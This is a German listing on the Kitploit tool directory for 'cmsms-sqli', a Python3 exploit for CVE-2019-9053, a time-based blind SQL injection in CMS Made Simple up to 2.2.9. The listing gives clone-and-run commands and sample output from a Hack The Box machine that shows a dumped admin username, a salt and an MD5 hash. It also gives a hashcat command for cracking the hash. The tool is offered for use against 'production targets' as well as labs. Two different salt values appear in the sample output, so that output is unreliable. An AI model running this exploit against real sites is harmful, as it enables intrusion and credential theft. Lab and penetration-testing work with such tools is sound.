Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cmsms-sqli — Python3-Exploit für CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Keine Abhängigkeiten, zeitbasierte blinde SQLi → Auslesen von Admin-Zugangsdaten. HTB Writeup abgeschlossen. | Kitploit
Tools/GitHubGitHub/tim-karov/cmsms-sqli
Passwort-CrackingSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstests
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Python3-Exploit für CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Keine Abhängigkeiten, zeitbasierte blinde SQLi → Auslesen von Admin-Zugangsdaten. HTB Writeup abgeschlossen.

Repository anzeigen
5vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CMS Made Simple <= 2.2.9 SQL Injection (CVE-2019-9053) - Python3 Exploit

Reiner Python3-Port des ursprünglichen Exploit-DB #46635 von Daniele Scanu. Zeitbasierte blinde SQLi zum Auslesen von Admin-Anmeldedaten aus verwundbaren CMS Made Simple-Installationen.

🎯 Funktionen:

✅ Keine externen Abhängigkeiten (nur requests)

✅ Python 3.6+ nativ (f-strings, Walross-Operator)

✅ Schöne farbige Ausgabe (ANSI)

✅ Stabil & schnell (~3–5 min Dump bei durchschnittlichen Verbindungen)

✅ Timeout/Fehlerbehandlung für Produktionsziele

✅ Hashcat-fähige Ausgabe (Salt + MD5-Format)

🚀 Nutzung:

root@kitploit:~
# Klonen & ausführen
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# Beispielausgabe (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Extrahiere SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Extrahiere BENUTZERNAME...
jkr
[+] Username: jkr
[+] Extrahiere PASSWORT MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 Anpassung:

root@kitploit:~
TIME = 3      # Schlafzeit (langsamer = stabiler)
timeout = 20  # Request-Timeout
chars = '...' # Benutzerdefinierter Zeichensatz

📝 Danksagung:

Ursprünglicher Autor: Daniele Scanu

Exploit-DB: #46635

Python3-Port & Verbesserungen: Tim Karov

📄 Lizenz:

MIT-Lizenz – Siehe LICENSE


⭐ Star, wenn nützlich! Verwendet in HTB/TryHackMe-Laboren & echten Pentests.

Tool herunterladen